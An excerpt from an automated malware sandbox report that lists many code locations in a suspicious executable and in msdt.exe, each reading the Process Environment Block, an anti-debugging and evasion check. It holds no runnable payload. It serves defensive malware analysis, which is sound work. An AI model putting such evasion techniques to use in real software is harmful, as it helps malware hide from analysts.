          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0192927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0199B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0199B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01998DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0196A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01907D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01923D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01963540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_018F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0197C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0191A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0190746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]7_2_01967794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]7_2_01967794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]7_2_01967794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F8794 mov eax, dword ptr fs:[00000030h]7_2_018F8794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019237F5 mov eax, dword ptr fs:[00000030h]7_2_019237F5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190F716 mov eax, dword ptr fs:[00000030h]7_2_0190F716
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FF10 mov eax, dword ptr fs:[00000030h]7_2_0197FF10
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FF10 mov eax, dword ptr fs:[00000030h]7_2_0197FF10
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B070D mov eax, dword ptr fs:[00000030h]7_2_019B070D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B070D mov eax, dword ptr fs:[00000030h]7_2_019B070D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A70E mov eax, dword ptr fs:[00000030h]7_2_0191A70E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A70E mov eax, dword ptr fs:[00000030h]7_2_0191A70E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E4F2E mov eax, dword ptr fs:[00000030h]7_2_018E4F2E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E4F2E mov eax, dword ptr fs:[00000030h]7_2_018E4F2E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191E730 mov eax, dword ptr fs:[00000030h]7_2_0191E730
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FEF40 mov eax, dword ptr fs:[00000030h]7_2_018FEF40
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FFF60 mov eax, dword ptr fs:[00000030h]7_2_018FFF60
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8F6A mov eax, dword ptr fs:[00000030h]7_2_019B8F6A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FE87 mov eax, dword ptr fs:[00000030h]7_2_0197FE87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019646A7 mov eax, dword ptr fs:[00000030h]7_2_019646A7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]7_2_019B0EA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]7_2_019B0EA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]7_2_019B0EA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8ED6 mov eax, dword ptr fs:[00000030h]7_2_019B8ED6
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01928EC7 mov eax, dword ptr fs:[00000030h]7_2_01928EC7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199FEC0 mov eax, dword ptr fs:[00000030h]7_2_0199FEC0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019136CC mov eax, dword ptr fs:[00000030h]7_2_019136CC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F76E2 mov eax, dword ptr fs:[00000030h]7_2_018F76E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019116E0 mov ecx, dword ptr fs:[00000030h]7_2_019116E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A61C mov eax, dword ptr fs:[00000030h]7_2_0191A61C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A61C mov eax, dword ptr fs:[00000030h]7_2_0191A61C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]7_2_018EC600
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]7_2_018EC600
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]7_2_018EC600
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01918E00 mov eax, dword ptr fs:[00000030h]7_2_01918E00
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1608 mov eax, dword ptr fs:[00000030h]7_2_019A1608
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199FE3F mov eax, dword ptr fs:[00000030h]7_2_0199FE3F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EE620 mov eax, dword ptr fs:[00000030h]7_2_018EE620
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAE44 mov eax, dword ptr fs:[00000030h]7_2_019AAE44
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAE44 mov eax, dword ptr fs:[00000030h]7_2_019AAE44
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F766D mov eax, dword ptr fs:[00000030h]7_2_018F766D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474746D mov eax, dword ptr fs:[00000030h]13_2_0474746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BC450 mov eax, dword ptr fs:[00000030h]13_2_047BC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BC450 mov eax, dword ptr fs:[00000030h]13_2_047BC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A44B mov eax, dword ptr fs:[00000030h]13_2_0475A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475BC2C mov eax, dword ptr fs:[00000030h]13_2_0475BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]13_2_047F740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]13_2_047F740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]13_2_047F740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E14FB mov eax, dword ptr fs:[00000030h]13_2_047E14FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]13_2_047A6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]13_2_047A6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]13_2_047A6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8CD6 mov eax, dword ptr fs:[00000030h]13_2_047F8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473849B mov eax, dword ptr fs:[00000030h]13_2_0473849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C577 mov eax, dword ptr fs:[00000030h]13_2_0474C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C577 mov eax, dword ptr fs:[00000030h]13_2_0474C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04747D50 mov eax, dword ptr fs:[00000030h]13_2_04747D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04763D43 mov eax, dword ptr fs:[00000030h]13_2_04763D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3540 mov eax, dword ptr fs:[00000030h]13_2_047A3540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AD30 mov eax, dword ptr fs:[00000030h]13_2_0472AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EE539 mov eax, dword ptr fs:[00000030h]13_2_047EE539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8D34 mov eax, dword ptr fs:[00000030h]13_2_047F8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047AA537 mov eax, dword ptr fs:[00000030h]13_2_047AA537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]13_2_04754D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]13_2_04754D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]13_2_04754D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047D8DF1 mov eax, dword ptr fs:[00000030h]13_2_047D8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0 mov eax, dword ptr fs:[00000030h]13_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0 mov eax, dword ptr fs:[00000030h]13_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
